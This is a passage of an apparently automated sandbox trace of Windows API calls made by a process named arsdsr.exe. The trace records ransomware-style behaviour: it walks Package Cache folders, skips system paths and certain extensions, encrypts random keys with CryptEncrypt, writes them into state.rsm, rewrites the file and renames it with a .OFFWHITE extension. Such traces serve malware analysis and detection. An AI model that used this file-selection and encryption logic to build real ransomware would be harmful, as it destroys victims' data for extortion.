lpString2=".cab") returned 0 [0148.417] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4374a500, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x4374a500, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x4374a500, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="..") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="...") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="windows") returned -1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$recycle.bin") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="rsa") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ntuser.dat") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="programdata") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="appdata") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="program files") returned 1 [0148.417] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="program files (x86)") returned 1 [0148.417] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\" [0148.417] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0148.417] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.417] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.417] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0148.417] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0148.418] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0148.418] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4374a500, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x4374a500, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x4374a500, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0148.418] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.418] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0148.418] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.418] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.418] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.418] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0148.418] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2=".") returned 1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="..") returned 1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="...") returned 1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="windows") returned -1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="$recycle.bin") returned 1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="rsa") returned -1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="ntuser.dat") returned -1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="programdata") returned -1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="appdata") returned -1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="program files") returned -1 [0148.419] lstrcmpiW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="program files (x86)") returned -1 [0148.419] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.419] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0148.419] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\" [0148.419] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\" [0148.419] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0148.419] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.420] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.420] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.420] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.420] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.420] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a127460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1c821ca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0148.420] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0148.420] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0148.420] lstrcmpiW (lpString1="state.rsm", lpString2="...") returned 1 [0148.420] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0148.420] lstrcmpiW (lpString1="state.rsm", lpString2="$recycle.bin") returned 1 [0148.421] lstrcmpiW (lpString1="state.rsm", lpString2="rsa") returned 1 [0148.421] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0148.421] lstrcmpiW (lpString1="state.rsm", lpString2="programdata") returned 1 [0148.421] lstrcmpiW (lpString1="state.rsm", lpString2="appdata") returned 1 [0148.421] lstrcmpiW (lpString1="state.rsm", lpString2="program files") returned 1 [0148.421] lstrcmpiW (lpString1="state.rsm", lpString2="program files (x86)") returned 1 [0148.421] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\" [0148.421] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" [0148.421] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.421] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.421] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".exe") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".log") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".cab") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".cmd") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".com") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".cpl") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".ini") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".dll") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".url") returned -1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".ttf") returned -1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".mp3") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".pif") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".mp4") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".OFFWHITE") returned 1 [0148.421] lstrcmpiW (lpString1=".rsm", lpString2=".msi") returned 1 [0148.422] lstrcmpiW (lpString1="state.rsm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0148.422] GetProcessHeap () returned 0x500000 [0148.422] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d88 [0148.422] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0148.423] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=666) returned 1 [0148.423] GetProcessHeap () returned 0x500000 [0148.423] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0148.423] GetProcessHeap () returned 0x500000 [0148.423] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0148.423] GetProcessHeap () returned 0x500000 [0148.423] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0148.423] GetProcessHeap () returned 0x500000 [0148.423] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0148.423] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.423] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.423] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0148.423] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.424] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.424] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0148.424] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.424] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.424] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295dc90*=0x100) returned 1 [0148.424] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.424] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.424] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0148.424] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x29a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.424] SetLastError (dwErrCode=0x0) [0148.424] WriteFile (in: hFile=0x21c, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0148.426] GetLastError () returned 0x0 [0148.426] GetLastError () returned 0x0 [0148.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x39a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.426] WriteFile (in: hFile=0x21c, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0148.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.426] WriteFile (in: hFile=0x21c, lpBuffer=0x526d88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526d88*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0148.426] GetProcessHeap () returned 0x500000 [0148.426] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x29a) returned 0x53e5b0 [0148.427] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.427] ReadFile (in: hFile=0x21c, lpBuffer=0x53e5b0, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesRead=0x295dec0*=0x29a, lpOverlapped=0x0) returned 1 [0148.427] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.427] WriteFile (in: hFile=0x21c, lpBuffer=0x53e5b0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesWritten=0x295decc*=0x29a, lpOverlapped=0x0) returned 1 [0148.427] GetProcessHeap () returned 0x500000 [0148.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53e5b0 | out: hHeap=0x500000) returned 1 [0148.427] CloseHandle (hObject=0x21c) returned 1 [0148.427] GetProcessHeap () returned 0x500000 [0148.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0148.427] GetProcessHeap () returned 0x500000 [0148.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0148.427] GetProcessHeap () returned 0x500000 [0148.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0148.427] GetProcessHeap () returned 0x500000 [0148.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0148.427] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" [0148.427] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.OFFWHITE" [0148.428] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.offwhite")) returned 1 [0148.428] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0148.428] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".") returned 1 [0148.428] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="..") returned 1 [0148.428] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="...") returned 1 [0148.428] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="windows") returned -1 [0148.428] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="$recycle.bin") returned 1 [0148.428] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="rsa") returned 1 [0148.429] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="ntuser.dat") returned 1 [0148.429] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="programdata") returned 1 [0148.429] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="appdata") returned 1 [0148.429] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="program files") returned 1 [0148.429] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="program files (x86)") returned 1 [0148.429] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\" [0148.429] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="vcredist_x64.exe" | out: lpString1="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned="C:/Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" [0148.429] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.429] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.429] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0148.429] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0148.429] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0148.429] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.429] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", cAlternateFileName="{582EA~1.250")) returned 1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2=".") returned 1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="..") returned 1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="...") returned 1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="windows") returned -1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="$recycle.bin") returned 1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="rsa") returned -1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="ntuser.dat") returned -1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="programdata") returned -1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="appdata") returned -1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="program files") returned -1 [0148.429] lstrcmpiW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="program files (x86)") returned -1 [0148.430] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.430] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" | out: lpString1="C:/Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") 